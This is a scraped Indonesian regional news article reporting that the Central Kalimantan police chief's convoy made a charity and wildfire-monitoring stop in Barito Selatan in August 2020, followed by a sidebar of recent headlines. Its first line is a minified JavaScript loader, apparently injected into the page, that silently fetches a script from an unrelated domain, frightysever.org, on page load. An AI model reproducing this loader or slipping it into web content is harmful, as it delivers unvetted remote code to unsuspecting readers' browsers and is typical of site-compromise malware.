(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Gelar Touring Kebangsaan, Kapolda Kalteng Sempatkan Singgah di Barsel


KANALKALIMANTAN.COM, BUNTOK – Kapolda Kalteng bersama rombongan laksanakan touring kebangsaan sekaligus bakti sosial. Di sela kegiatan, mereka menyempatkan diri singgah di Guest Hous Rujab Bupati Barsel, tadi malam Jumat (14/8/2020).

Kapolda Kalteng Irjen Dedi Prasetyo melalui Kabid Humas Polda Kombes Hendra Rochmawan mengatakan, tujuan kegiatan ini juga melakukan aksi bakti sosial untuk masyarakat.
“Jadi selain kita dapat memantau titik wilayah Karhutla yang rawan, kita juga sekaligus melakukan bakti sosial di tengah situasi pandemi kali ini,” kata Hendra kepada Kanalkalimantan.com, tadi malam.

Ia juga mengatakan, bahwa dalam pelaksanaan kegiatan Baksos ini sekaligus dikemas dengan memantau wilayah rawan terhadap Karhutla. “Pada touring ini ada sekaligus dua kegiatan yang dilaksanakan, selain aksi sosial berbagi juga memantau kesiapan masing-masing wilayah dalam memantau titik hotspot. Dan yang lebih mantap lagi pelaksanaan kegiatan ini kita bersinergi dengan TNI langsung,” beber Hendra.

Ditambahkan, pihaknya bersama-sama berangkat dari Korem juga IOF, bersama rombongan lainnya menjelajah bumi tambun bungai.
“Sasaran baksos kali ini adalah masyarakat yang terdampak covid-19 ini.Mereka akan mendapatkan bantuan baik beras maupun lainnya dari Presiden, Gubernur, dan pihak pemerintah terkait,” tegas Hendra.

Di tempat sama, Bupati Barsel H Eddy Raya Samsuri melalui Sekda Barsel Eddy Purwanto mengatakan, kunjungan ini merupakan hal luar biasa dan bermaanfaat bagi Barsel. “Kita terimakasih atas kunjungan Polda Kalteng bersama rombongan yang mau menyempatkan diri mampir di Barsel sekaligus dapat memberikan beberapa arahan,” ujar Eddy.

Ia menyadari, sinergi antara pemerintah dan TNI-Polri harus menjadi satu kesatuan utuh demi kemajuan Barsel. “Beliau tadi sempat berpesan untuk Pemkab Barsel agar jangan pernah berhenti memberikan edukasi kepada masyarakat terkait pentingnya penggunaan masker dalam mencegah Covid-19,” tutur Eddy.(kanalkalimantan.com/digdo)

 

Reporter: Digdo
Editor: Cell


Desy Arfianty

Recent Posts

Terselip Nama Aditya, PKB Keluarkan Rekomendasi 65 Calon Kepala Daerah

DPP PKB: Belum Ada Satu Rekomendasi Pun untuk Gubernur Read More

3 jam ago

Petani di HSU Dibekali Pelatihan Penggunaan Pestisida Terbatas

KANALKALIMANTAN.COM, AMUNTAI - Memanfaatkan herbisida aktif parakuat diklorida secara optimal dengan mengurangi dampak sekecil mungkin,… Read More

4 jam ago

BBPOM Gelar Bimtek Keamanan Pangan untuk Kader KPS Se-Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bimbingan Teknis (Bimtek) Keamanan Pangan untuk Kader Keamanan Pangan Sekolah (KPS) se-Kabupaten… Read More

5 jam ago

Hattrick PLN Raih Laba Bersih, Keuangan Terbaik Sepanjang Sejarah Perseroan

KANALKALIMANTAN.COM, JAKARTA - PT PLN (Persero) sukses membukukan keuntungan terbesar sepanjang sejarah perseroan dengan meraih… Read More

5 jam ago

Aeris Hotel Kadung Operasi, Wali Kota Banjarbaru Tak Akan Halangi Investasi

Catatan Dinas Terkait: Daya Tampung Parkir, Laik Sehat, Persetujuan Lingkungan, dan Limbah B3 Read More

7 jam ago

Ancar-ancar Poros Acil Odah-Rozanie di Pilgub Kalsel, Pesaing Muhidin-Hasnur

Rozanie Klaim Dapat Restu Surya Paloh saat Paman Birin ke Nasdem Tower Read More

8 jam ago

This website uses cookies.